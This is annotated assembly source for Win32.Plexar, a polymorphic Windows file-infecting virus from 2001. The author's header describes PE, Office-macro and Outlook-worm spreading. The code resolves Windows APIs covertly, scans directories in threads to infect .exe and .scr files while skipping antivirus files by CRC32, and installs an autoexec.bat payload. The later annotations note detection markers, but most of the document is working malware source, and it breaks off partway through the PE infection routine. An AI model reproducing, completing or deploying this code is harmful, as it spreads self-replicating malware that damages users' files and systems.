; ----------------------------------------------------------------------------
; < Win32.Plexar >
; Designed by LiteSys in Venezuela, South America
;
; PE/DOC/XLS/OUTLOOK Multithreaded Polymorphic Direct Action infector.
;
; Welcome to Plexar, my latest code.
;
; It infects PE files by incrementing the last section, I don't overwrite
; the .reloc section, it's preferable to leave it alone. In fact, this virus
; avoids infecting some AV or Win32 files that should never be infected.
; This is done by CRC32 comparison.
;
; Infects Word and Excel documents by dropping (thru VBScript) a macro
; module-infecting virus in the normal template and personal.xls that is
; capable of dropping an infected PE file to the Windows directory and then
; running it.
;
; Distributes through Electronic Mail by dropping a VBS worm capable of
; sending infected droppers to every email address in the Outlook address
; book. Sorry but I didn't have any time to code a decent MAPI worm =(.
;
; The Poly engine is another lame table-driven engine written by me =), no
; anti-aver intentions were the reason to write that poly engine, just to
; conceal the code a little. So I think it doesn't deserve an explanation
; because the garbage is very lame.
;
; It runs the different routines (word infection, vbs worm, direct action)
; in different threads. As I always said, I don't optimize my code too much.
;
; The payload is very funny and if you're from Venezuela I hope you
; appreciate it. It consists of dropping a simple com file that displays
; some silly stuff in spanish, it runs on autoexec.bat but won't display
; the message until the following rule is complied with (this is a very
; kewl idea I learnt from Byway ;D):
;
; If Month <= 7: Day = Month^2 / 3 + 4
; If Month >= 8: Day = Month^2 / 5 - 4
;
; So the payload will run on every month (as a coincidence, the formula
; pointed to December 24th :P). It's not destructive so don't blame me.
;
; This virus has lots of bugs, i've corrected many but still there are a
; lot. It was tested under Win95 (4.10.1111), Win98 (4.10.1998), WinME and
; WinNT (4.0/SP4), the virus worked perfectly under those versions. I don't
; know about Win98 SE and Win2K, since I don't have them installed, I have
; the CDs here but i'm a lazy ass and my HD space is totally phuken.
;
; Virus Size = 12kb. Code not commented. Not even AVP or Norton (with
; their "high heuristic" bloodhound shit) flagged the infected PE baits,
; except for Norton, which flagged the VBS worm.
;
; If you need to contact me you can use both mail addresses: litesys@monte.as
; or liteno2@softhome.net. Remember, for decent stuff.
;
; Patria o Muerte: Venceremos.
; LiteSys.
; Venezuela, Julio/Agosto - (c) 2001
; ----------------------------------------------------------------------------
; Assembler directives, includes and assemble-time constants.
; TASM syntax (PROC/ENDP, EQU <...>, ORG $-4) even though the page labels
; the file NASM.  Every data reference in the body goes through the
; EBP-relative macros below, because the code runs at whatever address the
; host maps it to; EBP receives the load delta at the entry point.
.586
.MODEL FLAT, STDCALL

; Build-machine include paths for the Win32 API declarations and the
; constants used below (MAX_PATH, GENERIC_WRITE, PAGE_READWRITE, ...).
INCLUDE C:\TOOLS\TASM\INCLUDE\WIN32API.INC
INCLUDE C:\TOOLS\TASM\INCLUDE\WINDOWS.INC

; Imports of the first-generation carrier; the body itself resolves every
; API at runtime through Busca_K32 / Busca_GPA / Busca_APIs.  Neither
; symbol is referenced in the portion of the file in view.
EXTRN ExitProcess:PROC
EXTRN MessageBoxExA:PROC

.DATA

DEBUG EQU FALSE                         ; TRUE runs Directa/Worm_VBS/Infecta_Word inline on the main thread (see entry code)

; Delta-offset helpers: OFS [x] / BY [x] / WO [x] / DWO [x] address label x
; relative to EBP, which holds (runtime address - assembled address).
OFS EQU <OFFSET [EBP]>
BY EQU <BYTE PTR [EBP]>
WO EQU <WORD PTR [EBP]>
DWO EQU <DWORD PTR [EBP]>
RDTSC EQU <DW 310Fh>                    ; raw encoding 0F 31 (RDTSC) for assemblers lacking the mnemonic; not used in the visible code

; Indirect call through a resolved-API slot; the slot holds the address
; written there by Busca_APIs.
APICALL MACRO APIz
CALL DWORD PTR [APIz + EBP]
ENDM

Numero_Paginas EQU 32h                  ; number of 64 KB steps Busca_K32 scans downward for kernel32 (50 steps)
K32_W9X EQU 0BFF70000h                  ; hard-coded kernel32 base used as fallback by Busca_K32 (Win9x only)
GPA_W9X EQU 0BFF76DACh                  ; hard-coded GetProcAddress used as fallback by Busca_GPA (Win9x only)
Virus_Tama<EFBFBD>o EQU (Termina_Plexar - Empieza_Plexar)   ; body length in bytes (the mangled character is most likely a CP437 'ñ': Tamaño = size)

; "Plexar.NNNNN": the body size rendered as five decimal digits at
; assemble time.  Presumably the caption for a MessageBox (caller not in view).
Titulo DB "Plexar."
DB Virus_Tama<EFBFBD>o / 10000 MOD 10 + 30h
DB Virus_Tama<EFBFBD>o / 01000 MOD 10 + 30h
DB Virus_Tama<EFBFBD>o / 00100 MOD 10 + 30h
DB Virus_Tama<EFBFBD>o / 00010 MOD 10 + 30h
DB Virus_Tama<EFBFBD>o / 00001 MOD 10 + 30h
DB 00h

; Message text ("-- Activado." = "-- Activated."); user not in view.
Mensaje DB "Plexar (c) 2001 LiteSys "
DB "-- Activado."
DB 00h

; Registry constants; no use of them is visible in this part of the file.
REG_SZ EQU <1>
HKEY_LOCAL_MACHINE EQU <80000002h>

.CODE
; Entry point of the body.  Infecta_PE points the victim's
; AddressOfEntryPoint here; HostBack (at the bottom) carries the victim's
; original entry point so the host still runs afterwards.
; Sequence: compute the load delta -> install an SEH frame -> locate
; kernel32 and GetProcAddress starting from the return address into
; kernel32 -> resolve the API table -> run the worker threads and the
; payload -> return to the host.  Any exception in between reaches the
; handler, which unwinds straight to @FueraHost, so the host starts even
; when the body faults.
Empieza_Plexar:

        CALL @Delta
@Delta:
        POP EAX                         ; EAX = runtime address of @Delta
        XCHG EBP, EAX
        SUB EBP, OFFSET @Delta          ; EBP = delta used by OFS/BY/WO/DWO/APICALL

        JMP @@1
        DB 00h, 00h, "[PLEXAR]", 00h, 00h   ; plaintext tag right after the entry stub (static-signature material)
@@1:

        CALL @SEH_1                     ; pushes the address of the next line: it becomes the SEH handler
        ; --- exception handler ---
        MOV ESP, DWORD PTR [ESP+8h]     ; ESP = EstablisherFrame, i.e. the registration record pushed at @SEH_1
        JMP @FueraHost                  ; unlink the frame and hand control to the host

@SEH_1:

        XOR EAX, EAX
        PUSH DWORD PTR FS:[EAX]         ; previous handler; together with the pushed handler address this is the registration record
        MOV FS:[EAX], ESP               ; FS:[0] -> new record

        MOV EDI, DWORD PTR [ESP+8h]     ; the dword above the record: the host's return address into kernel32 (process start-up code)
        CALL Busca_K32                  ; -> DWO [KERNEL32]: image base found by scanning down from EDI, or the Win9x constant
        CALL Busca_GPA                  ; -> DWO [GetProcAddress]: export walk matched by CRC32, or the Win9x constant

        LEA ESI, OFS [CreateFileA]      ; first slot of the resolved-API table (slots filled in list order)
        LEA EDI, OFS [APIs_K32]         ; packed API-name list (not in view), 0FFh-terminated
        MOV EBX, DWO [KERNEL32]
        CALL Busca_APIs

        LEA EDX, OFS [RewtDir]          ; starting directory for Directa
        PUSH EDX
        PUSH MAX_PATH
        APICALL GetCurrentDirectoryA
        OR EAX, EAX
        JZ @FueraHost

IF DEBUG

        ; Debug build: run the three workers one after another on this
        ; thread (each takes the delta as its DeltaOfs parameter) and skip
        ; the payload.
        PUSH EBP
        CALL Directa

        PUSH EBP
        CALL Worm_VBS

        PUSH EBP
        CALL Infecta_Word

        JMP @FueraHost

ELSE

        CALL Thread                     ; spawn Directa, Worm_VBS and Infecta_Word as threads and wait for them

ENDIF

        CALL Er_Pailon                  ; payload installer: drops a file and appends a line to autoexec.bat

@FueraHost:

        XOR ECX, ECX
        POP DWORD PTR FS:[ECX]          ; restore the previous SEH handler
        POP ECX                         ; discard our handler address

        ; PUSH imm32 / RET into the host.  ORG $-4 backs the location
        ; counter over the immediate so HostBack overlays it: Infecta_PE
        ; writes ImageBase + AddressOfEntryPoint of the victim here before
        ; the body is copied, so each infected file carries its own host
        ; entry point.  The first generation holds OFFSET Mentira (label not
        ; in view).
        PUSH 12345678h
        ORG $-4
HostBack DD OFFSET Mentira
        RET

; ----------------------------------------------------------------------------

; Main thread: launches the other threads.

; Thread: spawns the three worker routines and blocks until they finish.
; Directa runs first and to completion (polled through Listo_Directa),
; then Worm_VBS and Infecta_Word run concurrently.  Each worker gets EBP
; (the delta) as its lpParameter and THREAD_PRIORITY_HIGHEST.
; Registers preserved (PUSHAD/POPAD).
; Side effects: Thread_Directa / Thread_WormVBS / Thread_IWord first
; receive the thread id (lpThreadId) and are then overwritten with the
; handle returned by CreateThread.  A failed CreateThread abandons the
; remaining workers (JZ @FinThread).
Thread PROC
        PUSHAD

        AND BY [Listo_Directa], 00h     ; clear the "Directa finished" flag (Directa sets it before ExitThread)

        XOR EAX, EAX
        LEA EBX, OFS [Thread_Directa]
        PUSH EBX                        ; lpThreadId
        PUSH EAX                        ; dwCreationFlags = 0: runs immediately
        PUSH EBP                        ; lpParameter = delta
        LEA EBX, OFS [Directa]
        PUSH EBX                        ; lpStartAddress
        PUSH EAX                        ; dwStackSize = 0 (default)
        PUSH EAX                        ; lpThreadAttributes = NULL
        APICALL CreateThread
        MOV DWO [Thread_Directa], EAX   ; keep the handle, replacing the id stored above
        OR EAX, EAX
        JZ @FinThread

        PUSH 02h                        ; THREAD_PRIORITY_HIGHEST
        PUSH EAX
        APICALL SetThreadPriority

@RevDirect:
        PUSH -1                         ; INFINITE
        PUSH DWO [Thread_Directa]
        APICALL WaitForSingleObject

        CMP BY [Listo_Directa], 01h     ; also require the flag Directa sets; wait again until it is there
        JNZ @RevDirect

        XOR EAX, EAX
        LEA EBX, OFS [Thread_WormVBS]
        PUSH EBX                        ; lpThreadId
        PUSH EAX                        ; dwCreationFlags
        PUSH EBP                        ; lpParameter = delta
        LEA EBX, OFS [Worm_VBS]
        PUSH EBX                        ; lpStartAddress
        PUSH EAX                        ; dwStackSize
        PUSH EAX                        ; lpThreadAttributes
        APICALL CreateThread
        MOV DWO [Thread_WormVBS], EAX   ; handle
        OR EAX, EAX
        JZ @FinThread

        PUSH 02h                        ; THREAD_PRIORITY_HIGHEST
        PUSH EAX
        APICALL SetThreadPriority

        XOR EAX, EAX
        LEA EBX, OFS [Thread_IWord]
        PUSH EBX                        ; lpThreadId
        PUSH EAX                        ; dwCreationFlags
        PUSH EBP                        ; lpParameter = delta
        LEA EBX, OFS [Infecta_Word]
        PUSH EBX                        ; lpStartAddress
        PUSH EAX                        ; dwStackSize
        PUSH EAX                        ; lpThreadAttributes
        APICALL CreateThread
        MOV DWO [Thread_IWord], EAX     ; handle
        OR EAX, EAX
        JZ @FinThread

        PUSH 02h                        ; THREAD_PRIORITY_HIGHEST
        PUSH EAX
        APICALL SetThreadPriority

        PUSH -1                         ; INFINITE
        PUSH TRUE                       ; bWaitAll
        LEA EAX, OFS [Thread_WormVBS]   ; lpHandles: assumes Thread_IWord is the dword right after Thread_WormVBS (definitions not in view)
        PUSH EAX
        PUSH 02h                        ; nCount
        APICALL WaitForMultipleObjects

@FinThread:

        POPAD
        RET

Thread ENDP

; ----------------------------------------------------------------------------

; Payload.

; Er_Pailon: payload installer.
; 1. Creates the file named by CocoFrio (CREATE_NEW: only when it does not
;    exist yet) and writes Largo_PProg bytes of Payload_Prog into it (per
;    the file header, a small .com program).
; 2. Opens the file named by AutoExec, seeks to its end and appends the
;    CocoFrio string without its NUL, so the dropped program is started
;    from autoexec.bat at boot.
; Strings and lengths are not in view.  Registers preserved.  Every step
; bails out to @P_Fin on failure; on the WriteFile failure paths the
; handle in PFHandle is left open.
Er_Pailon PROC
        PUSHAD

        CDQ                             ; EDX = sign extension of EAX, used below as the zero/NULL arguments
        PUSH EDX                        ; hTemplateFile
        PUSH FILE_ATTRIBUTE_NORMAL
        PUSH CREATE_NEW                 ; fails if the file already exists: the payload is installed once
        PUSH EDX                        ; lpSecurityAttributes
        PUSH EDX                        ; dwShareMode
        PUSH GENERIC_WRITE
        LEA EAX, OFS [CocoFrio]         ; path of the dropped program
        PUSH EAX
        APICALL CreateFileA
        MOV DWO [PFHandle], EAX
        INC EAX
        JZ @P_Fin                       ; INVALID_HANDLE_VALUE
        DEC EAX
        XCHG EBX, EAX                   ; EBX = handle

        XOR EDX, EDX
        PUSH EDX                        ; lpOverlapped
        LEA EAX, OFS [PTemporal]
        PUSH EAX                        ; lpNumberOfBytesWritten
        PUSH Largo_PProg                ; nNumberOfBytesToWrite
        LEA EAX, OFS [Payload_Prog]
        PUSH EAX                        ; lpBuffer
        PUSH EBX
        APICALL WriteFile
        OR EAX, EAX
        JZ @P_Fin

        PUSH DWO [PFHandle]
        APICALL CloseHandle

        CDQ                             ; EDX = sign extension of EAX (the CloseHandle result)
        PUSH EDX                        ; hTemplateFile
        PUSH FILE_ATTRIBUTE_NORMAL
        PUSH OPEN_EXISTING
        PUSH EDX                        ; lpSecurityAttributes
        PUSH EDX                        ; dwShareMode
        PUSH GENERIC_WRITE
        LEA EAX, OFS [AutoExec]         ; per the file header: autoexec.bat
        PUSH EAX
        APICALL CreateFileA
        MOV DWO [PFHandle], EAX
        INC EAX
        JZ @P_Fin
        DEC EAX

        CDQ
        PUSH 00000002h                  ; FILE_END
        PUSH EDX                        ; lpDistanceToMoveHigh
        PUSH EDX                        ; lDistanceToMove = 0
        PUSH EAX                        ; hFile
        APICALL SetFilePointer          ; position at end of file: append

        CDQ                             ; EAX = new file position
        PUSH EDX                        ; lpOverlapped
        LEA EAX, OFS [PTemporal]
        PUSH EAX                        ; lpNumberOfBytesWritten
        PUSH Largo_CocoFrio-1           ; string length without the terminating NUL
        LEA EAX, OFS [CocoFrio]         ; the same path string is the line appended to autoexec
        PUSH EAX
        PUSH DWO [PFHandle]
        APICALL WriteFile
        OR EAX, EAX
        JZ @P_Fin

        PUSH DWO [PFHandle]
        APICALL CloseHandle

@P_Fin:

        POPAD
        RET
Er_Pailon ENDP

; ----------------------------------------------------------------------------

; Routine to find the KERNEL32 base

; Busca_K32: locate the kernel32 image base.
; In:  EDI = an address inside kernel32 (the host's return address, taken
;      from the stack by the entry code).
; Out: DWO [KERNEL32] = base of the first MZ/PE image found scanning
;      downward in 64 KB steps from EDI (at most Numero_Paginas steps), or
;      the Win9x constant K32_W9X when nothing is found.
; Clobbers EDI, ECX, BX, flags.  A read of an unmapped page would fault;
; the caller's SEH frame catches that and abandons the whole body.
Busca_K32 PROC

        AND EDI, 0FFFF0000h             ; round down to a 64 KB boundary (image bases are 64 KB aligned)
        PUSH Numero_Paginas
        POP ECX                         ; ECX = 32h candidate bases to try

@Compara_K32:

        PUSH EDI                        ; candidate base; popped into KERNEL32 on success

        ; Masked test for the "MZ" (5A4Dh) signature: (w | 3D5Bh) == 7F5Fh.
        ; Not an exact compare - any word that agrees with 5A4Dh in the bit
        ; positions where 3D5Bh is zero passes - but the literal 'MZ'
        ; constant does not appear in the code.
        MOV BX, WORD PTR [EDI]
        OR BX, 03D5Bh ; 5A4D || 3D5B == 7F5F
        SUB BX, 07F5Fh
        JNZ @Incrementa_K32

        ADD EDI, [EDI+3Ch]              ; EDI = base + e_lfanew -> PE header
        ; Masked test for "PE\0\0" (4550h): (w & C443h) == 4440h, same idea.
        MOV BX, WORD PTR [EDI] ; 4550 && C443 == 4440
        AND BX, 0C443h
        XOR BX, 04440h
        JE @EnK32                       ; found: the pushed candidate is the base

@Incrementa_K32:

        POP EDI

        SUB EDI, 10000h                 ; previous 64 KB block
        LOOP @Compara_K32

        PUSH K32_W9X                    ; nothing found: fall back to the hard-coded Win9x base

@EnK32:

        POP DWO [KERNEL32]
        RET

Busca_K32 ENDP

; ----------------------------------------------------------------------------

        DB 5 DUP (90h)                  ; five NOP bytes of padding between Busca_K32 and Busca_GPA

; Routine to find GetProcAddress

; Busca_GPA: find GetProcAddress in kernel32's export table.
; In:  DWO [KERNEL32] = module base.
; Out: DWO [GetProcAddress] = function address; DWO [Exports] = export
;      directory.  Falls back to the Win9x constant GPA_W9X when no name
;      matches.
; Clobbers EAX, EBX, ECX, ESI, EDI, flags.
; The name is matched by CRC32 (constants CRC32_GetProcAddress and
; l_GetProcAddress not in view) rather than by string compare, so the
; literal "GetProcAddress" does not appear in the body.
; Note: the loop count is NumberOfNames - 1, so the last exported name is
; never examined.
Busca_GPA PROC

        MOV EBX, DWO [KERNEL32]         ; EBX = module base, added to every RVA below
        MOV EDI, EBX

        ADD EDI, DWORD PTR [EDI+3Ch]    ; EDI = PE header
        MOV EDI, DWORD PTR [EDI+78h]    ; DataDirectory[EXPORT].VirtualAddress
        ADD EDI, EBX
        MOV DWO [Exports], EDI          ; export directory, reused after the match

        MOV ECX, DWORD PTR [EDI+18h]    ; NumberOfNames
        DEC ECX                         ; loop count = NumberOfNames - 1

        MOV EDI, DWORD PTR [EDI+20h]    ; AddressOfNames
        ADD EDI, EBX

        XOR EAX, EAX                    ; EAX = index into the name table

@BGPA_1:

        MOV ESI, DWORD PTR [EDI]        ; name RVA
        ADD ESI, EBX                    ; ESI -> exported name
        PUSH EDI

        PUSH l_GetProcAddress
        POP EDI                         ; EDI = number of bytes to hash
        PUSHAD
        CALL CRC32                      ; EAX = CRC32(ESI, EDI) (routine not in view; convention inferred from its call sites)
        CMP EAX, CRC32_GetProcAddress   ; flags survive the POPAD / POP below
        POPAD
        POP EDI
        JE @BGPA_2

        INC EAX
        ADD EDI, 4h                     ; next name pointer

        LOOP @BGPA_1

        PUSH GPA_W9X                    ; not found: hard-coded Win9x address

        JMP @BGPA_3

@BGPA_2:

        MOV ESI, DWO [Exports]
        ADD EAX, EAX                    ; index * sizeof(WORD)

        MOV EDI, DWORD PTR [ESI+24h]    ; AddressOfNameOrdinals
        ADD EDI, EBX
        ADD EDI, EAX

        MOVZX EAX, WORD PTR [EDI]       ; ordinal = index into the function table
        IMUL EAX, 4h

        MOV EDI, DWORD PTR [ESI+1Ch]    ; AddressOfFunctions
        ADD EDI, EBX
        ADD EDI, EAX

        MOV EAX, DWORD PTR [EDI]        ; function RVA
        ADD EAX, EBX

        PUSH EAX

@BGPA_3:

        POP DWO [GetProcAddress]

        RET

Busca_GPA ENDP

; ----------------------------------------------------------------------------

; ESI -> where to store the APIs
; EDI -> API name strings
; EBX -> module

; Routine to look up the APIs

; Busca_APIs: resolve a list of API names with GetProcAddress and store
; the addresses in consecutive dword slots.
; In:  ESI -> output table (first slot); EDI -> packed name list;
;      EBX = module base.  Registers preserved (PUSHAD/POPAD).
; Name encoding (decoded into TempAPI one name at a time): a byte above
; 0Eh is a literal character; a byte in 1..0Eh selects a fragment of the
; dictionary PackedAPIs (skip that many NUL terminators, copy the fragment
; that follows); 00h ends a name; 0FFh ends the list.  The dictionary and
; the list itself are not in view.
; The GetProcAddress result is stored without being checked, so an
; unresolved name leaves a NULL slot.  The output pointer lives inside the
; code as the immediate of a MOV (Guardalo): the routine patches itself
; while running, which is why the body needs a writable section.
Busca_APIs PROC

        PUSHAD

        MOV DWO [Guardalo], ESI         ; output pointer -> the MOV immediate below
        XCHG EDI, ESI                   ; ESI -> packed name list

@BA1:
        LEA EDI, OFS [TempAPI]          ; EDI -> decode buffer for one name
@BA2:

        CMP BYTE PTR [ESI], 00h
        JE @BA4                         ; 00h: name complete

        LODSB
        CMP AL, 0Eh
        JA @BA3                         ; above 0Eh: literal character

        XOR ECX, ECX
        XCHG CL, AL                     ; CL = number of NUL terminators to skip in the dictionary

        PUSH ESI
        LEA ESI, OFS [PackedAPIs]       ; dictionary of NUL-separated fragments

@BA5:
        INC ESI
        CMP BYTE PTR [ESI], 00h
        JNZ @BA5                        ; advance to the next NUL

        LOOP @BA5                       ; until CL terminators have been passed

        INC ESI                         ; step over the NUL
@BA6:
        MOVSB                           ; copy the fragment into TempAPI
        CMP BYTE PTR [ESI], 00h
        JNZ @BA6

        POP ESI
        JMP @BA2

@BA3:
        STOSB                           ; literal byte
        JMP @BA2

@BA4:

        XOR AL, AL
        STOSB                           ; terminate the decoded name

        LEA EAX, OFS [TempAPI]
        PUSH EAX                        ; lpProcName
        PUSH EBX                        ; hModule
        CALL [GetProcAddress+EBP]       ; same as APICALL GetProcAddress
        NOP

        PUSH ESI
        MOV ESI, 12345678h              ; immediate overlaid by Guardalo: ESI = current output slot
        ORG $-4
Guardalo DD 00000000h
        MOV DWORD PTR [ESI], EAX        ; store the address (or NULL)
        ADD DWO [Guardalo], 00000004h   ; advance to the next slot
        POP ESI

        INC ESI                         ; skip the name's NUL

        CMP BYTE PTR [ESI], 0FFh
        JNZ @BA1                        ; 0FFh ends the list

@OA7:

        POPAD

        RET

Busca_APIs ENDP

; ----------------------------------------------------------------------------

; Direct action.

; Directa: direct-action infector, run as a thread by Thread.
; Parameter DeltaOfs (Pascal convention; the single DWORD CreateThread
; passes as lpParameter) is the EBP delta.  Starting in RewtDir, it
; enumerates the files matching Mascara (pattern not in view), hands those
; whose lower-cased extension CRC32-matches ".exe" or ".scr" to
; Infecta_PE, then changes directory to Puto_Puto (string not in view)
; and repeats until the current directory's length stops changing.
; Runs under its own SEH frame: a fault ends the routine the same way as
; normal completion.  Non-debug build: sets Listo_Directa for Thread and
; terminates itself with ExitThread, never returning to the caller.
Directa PROC Pascal DeltaOfs:DWORD

        PUSHAD

        MOV EBP, DeltaOfs               ; EBP = delta for OFS/DWO/APICALL

        CALL @SEH_2                     ; push handler address
        ; --- exception handler ---
        MOV ESP, DWORD PTR [ESP+8h]     ; ESP = registration record
        JMP @DIRF

@SEH_2:

        XOR EAX, EAX
        PUSH DWORD PTR FS:[EAX]
        MOV FS:[EAX], ESP               ; install the SEH frame

        LEA EDX, OFS [RewtDir]          ; directory captured by the entry code
        PUSH EDX
        APICALL SetCurrentDirectoryA
        OR EAX, EAX
        JZ @DIRF

@DIR1:

        LEA EAX, OFS [Busqueda]         ; WIN32_FIND_DATA
        PUSH EAX
        LEA EAX, OFS [Mascara]          ; search pattern
        PUSH EAX
        APICALL FindFirstFileA
        MOV DWO [BHandle], EAX
        INC EAX
        JZ @DIR2                        ; INVALID_HANDLE_VALUE: nothing matched here

@DIR3:

        LEA EDI, OFS [Busqueda.wfd_szFileName]
        MOV EBX, EDI                    ; EBX = file name (argument for Infecta_PE)
        PUSH EBX
        XOR AL, AL
        SCASB
        JNZ $-1                         ; repeat SCASB until the NUL is passed
        XCHG ESI, EDI
        SUB ESI, 5h                     ; ESI -> last four characters (".ext")
        OR DWORD PTR [ESI], 20202020h   ; lower-case them in place
        MOV EDI, 5h                     ; CRC32 over ".ext" plus its NUL
        CALL CRC32
        POP EBX
        CMP EAX, CRC_EXE ; .exe crc32
        JE @Infecta_Este_Exe
        CMP EAX, CRC_SCR ; .scr crc32
        JE @Infecta_Este_Exe

@Retorna_Directa:

        LEA EAX, OFS [Busqueda]
        PUSH EAX
        PUSH DWO [BHandle]
        APICALL FindNextFileA
        OR EAX, EAX
        JNZ @DIR3

        PUSH DWO [BHandle]
        APICALL FindClose

@DIR2:

        LEA EAX, OFS [Puto_Puto]        ; next directory (string not in view; the length test below suggests "..")
        PUSH EAX
        APICALL SetCurrentDirectoryA

        LEA EAX, OFS [Busqueda.wfd_szFileName]   ; find-data name field reused as scratch
        PUSH EAX
        PUSH MAX_PATH
        APICALL GetCurrentDirectoryA
        CMP EAX, DWO [LargPP]           ; same path length as last round: the directory did not change, stop
        JZ @DIRF
        MOV DWO [LargPP], EAX
        JMP @DIR1

        ; Not reachable: the JMP above is unconditional.
        LEA EAX, OFS [RewtDir]
        PUSH EAX
        APICALL SetCurrentDirectoryA

@DIRF:

        XOR ECX, ECX
        POP DWORD PTR FS:[ECX]          ; unlink the SEH frame
        POP ECX

IF DEBUG

        POPAD
        RET

ELSE

        INC BY [Listo_Directa]          ; tell Thread the scan is done

        MOV DWO [GuardaEBP], EBP        ; patch the MOV immediate below (self-modifying)
        POPAD

        MOV EBX, 12345678h              ; immediate overlaid by GuardaEBP: EBX = delta after POPAD restored EBP
        ORG $-4
GuardaEBP DD 00000000h

        PUSH NULL                       ; dwExitCode
        CALL [EBX+ExitThread]           ; does not return

        RET

ENDIF

@Infecta_Este_Exe:
        CALL Infecta_PE                 ; EBX -> file name
        JMP @Retorna_Directa

Directa ENDP

; ----------------------------------------------------------------------------

; Routine to infect a PE.
;
; EBX -> file to infect

; Infecta_PE: append the body to the last section of a PE file and
; redirect its entry point.
; In:  EBX -> file name.  Uses the EBP delta.  Registers preserved.
; Flow: exclusion list -> open and size checks -> map the file grown by
; Virus_Tamaño + 1400h -> header sanity and infection-marker checks ->
; patch the last section header, SizeOfImage and AddressOfEntryPoint ->
; copy the body via PXPE -> truncate, unmap, close.
; What an infected file looks like afterwards (detection hooks):
;   - Win32VersionValue (PE+4Ch, normally zero) holds "plxr"
;   - the last section gains IMAGE_SCN_CNT_CODE | MEM_EXECUTE | MEM_WRITE
;   - the entry point moves to the old end of the last section
;   - the file is longer by exactly Virus_Tamaño + 1400h bytes
; A file is left alone when: the CRC32 of the first 4 bytes of its name
; matches one of the 19 CRCNoInf entries, its size is < 8192 or unknown,
; it has no MZ/PE signature, e_lfanew points outside the file, or the
; marker is already present.  A fault anywhere is caught by the local SEH
; frame and lands at @PEF (handles may then remain open).
Infecta_PE PROC

        PUSHAD

        PUSH DWO [HostBack]
        POP DWO [Guarda_EIP]            ; save our own host's entry point; HostBack gets the victim's below and is restored at @PEF

        CALL @Seh_IPE
        ; --- exception handler ---
        MOV ESP, [ESP+8h]
        JMP @PEF

@Seh_IPE:

        XOR EAX, EAX
        PUSH DWORD PTR FS:[EAX]
        MOV FS:[EAX], ESP               ; install the SEH frame

        PUSH 019d
        POP ECX                         ; 19 entries in the exclusion table

        MOV ESI, EBX                    ; CRC32 input: the file name
        LEA EDX, OFS [CRCNoInf]         ; table of CRC32 values (not in view; per the header, AV/system file names)

@CicloNo:

        PUSH 04h
        POP EDI                         ; hash the first 4 bytes of the name only
        PUSH EBX
        PUSH ESI
        PUSH EDX
        PUSH ECX
        CALL CRC32                      ; EAX = CRC32(ESI, EDI) (routine not in view; convention inferred from its call sites)
        POP ECX
        POP EDX
        POP ESI
        POP EBX
        CMP EAX, DWORD PTR [EDX]
        JZ @PEF                         ; excluded name: leave the file untouched
        ADD EDX, 4h
        LOOP @CicloNo

        PUSH 00000000h
        PUSH EBX
        APICALL SetFileAttributesA      ; clear the target's attributes (read-only etc.)

        XOR EAX, EAX
        PUSH EAX                        ; hTemplateFile
        PUSH 00000000h                  ; dwFlagsAndAttributes
        PUSH OPEN_EXISTING
        PUSH EAX                        ; lpSecurityAttributes
        PUSH EAX                        ; dwShareMode = 0 (exclusive)
        PUSH GENERIC_READ + GENERIC_WRITE
        PUSH EBX
        APICALL CreateFileA
        MOV DWO [FHandle], EAX
        INC EAX
        JZ @PEF                         ; INVALID_HANDLE_VALUE

        DEC EAX
        PUSH NULL
        PUSH EAX
        APICALL GetFileSize
        MOV DWO [Tama<EFBFBD>o_1], EAX      ; original size ("Tamaño" with a mangled character)
        INC EAX
        JZ @PE_Close                    ; INVALID_FILE_SIZE
        DEC EAX

        CMP EAX, 8192d
        JB @PE_Close                    ; files under 8 KB are skipped

        ADD EAX, Virus_Tama<EFBFBD>o + 1400h
        MOV DWO [Tama<EFBFBD>o_2], EAX      ; size of the grown file / mapping

        XOR EDX, EDX
        PUSH EDX                        ; lpName
        PUSH EAX                        ; dwMaximumSizeLow: a mapping larger than the file extends it
        PUSH EDX                        ; dwMaximumSizeHigh
        PUSH PAGE_READWRITE
        PUSH EDX                        ; lpAttributes
        PUSH DWO [FHandle]
        APICALL CreateFileMappingA
        MOV DWO [MHandle], EAX
        OR EAX, EAX
        JZ @PE_Close

        XOR EDX, EDX
        PUSH DWO [Tama<EFBFBD>o_2]          ; dwNumberOfBytesToMap
        PUSH EDX                        ; dwFileOffsetLow
        PUSH EDX                        ; dwFileOffsetHigh
        PUSH FILE_MAP_WRITE
        PUSH EAX
        APICALL MapViewOfFile
        MOV DWO [BaseMap], EAX
        OR EAX, EAX
        JZ @PE_CloseMap

        MOV EDI, EAX                    ; EDI = start of the mapped file
        ; Masked "MZ" test: ((w & 3ED4h) * 2) == 3488h, since 5A4Dh & 3ED4h == 1A44h.
        ; (The author's note says "^" and 1444h; the instruction is AND and the value is 1A44h.)
        MOV BX, WORD PTR [EDI]
        AND BX, 3ED4h ; "ZM" = 5A4Dh ^ 3ED4h == 1444h
        ADD BX, BX
        XOR BX, 3488h
        JNZ @PE_UnMap

        MOV EBX, DWORD PTR [EDI+3Ch]    ; e_lfanew
        ADD EBX, EDI
        CMP EBX, DWO [BaseMap]
        JB @PE_UnMap                    ; the PE header must lie inside the original file
        MOV EDX, DWO [BaseMap]
        ADD EDX, DWO [Tama<EFBFBD>o_1]
        CMP EBX, EDX
        JA @Pe_UnMap

        ADD EDI, [EDI+3Ch]              ; EDI = PE header
        ; Masked "PE\0\0" test: (w | 0AEDAh) == 0EFDAh.
        MOV BX, WORD PTR [EDI]
        OR BX, 0AEDAh ; "EP" = 4550h | 0AEDAh == 0EFDAh
        SUB BX, 0EFDAh
        JNZ @PE_UnMap

        MOV ESI, EDI
        PUSHAD
        ADD ESI, 4Ch                    ; PE+4Ch = OptionalHeader.Win32VersionValue (reserved field)
        MOV EDI, 5h                     ; CRC32 over the marker dword plus the byte after it
        CALL CRC32
        CMP EAX, CRC_PLXR
        POPAD                           ; POPAD does not touch the flags
        JE @PE_UnMap                    ; already infected

        ; Infection marker.  The XOR pair rebuilds the constant "rxlp" at
        ; runtime so the plaintext dword is absent from the body.  TASM
        ; packs the first character of a multi-character constant into the
        ; high byte, so the bytes stored in the file should read "plxr" -
        ; confirm against an infected sample.
        MOV EAX, "rxlp" XOR 0C3E8F2A8h
        XOR EAX, 0C3E8F2A8h
        MOV DWORD PTR [EDI+4Ch], EAX

        ADD ESI, 18h                    ; ESI = optional header
        MOVZX EAX, WORD PTR [EDI+14h]   ; SizeOfOptionalHeader
        ADD ESI, EAX                    ; ESI = first section header

        XOR EDX, EDX
        MOVZX EDX, WORD PTR [EDI+06h]   ; NumberOfSections
        DEC EDX
        IMUL EDX, 28h                   ; sizeof(IMAGE_SECTION_HEADER)
        ADD ESI, EDX                    ; ESI = last section header

